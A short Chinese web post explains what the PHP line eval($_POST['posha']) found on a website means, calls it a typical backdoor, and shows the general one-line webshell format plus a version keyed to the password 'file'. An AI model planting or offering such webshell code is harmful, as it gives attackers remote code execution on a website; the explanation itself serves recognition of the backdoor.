![网站中出现<?php eval($_POST['posha']);?> 这段代码?什么意思?,第1张](/aiimages/%E7%BD%91%E7%AB%99%E4%B8%AD%E5%87%BA%E7%8E%B0%26amp%3Blt%3B%3Fphp+eval%28%24_POST%5B%26%23039%3Bposha%26%23039%3B%5D%29%3B%3F%26amp%3Bgt%3B+%E8%BF%99%E6%AE%B5%E4%BB%A3%E7%A0%81%EF%BC%9F%E4%BB%80%E4%B9%88%E6%84%8F%E6%80%9D%EF%BC%9F.png "网站中出现<?php eval($_POST['posha']);?> 这段代码?什么意思?,第1张")
这是一个典型的后门程序,首先我解释一下eval函数的作用,
//eval — 把字符串作为PHP代码执行eval('echo 123')//输出123
也就是说,所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST['posha']的话,只要使用post传输时在name为posha的值中写入任何字符串,都可以当做php代码来执行,这个时候就有点可怕了,比如写入一段循环删除整站代码等等。
PHP一句话木马是一种利用PHP的eval函数执行任意代码的后门程序。一般格式为:<?php @eval ($_POST ['password'])?>
其中,password是连接木马时需要输入的密码,可以自定义。如果您想要写一个密码为file的一句话木马,那么可以这样写:
<?php @eval ($_POST ['file'])?>
请注意,这种木马非常危险,可能导致网站被黑客入侵或破坏,请谨慎使用。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)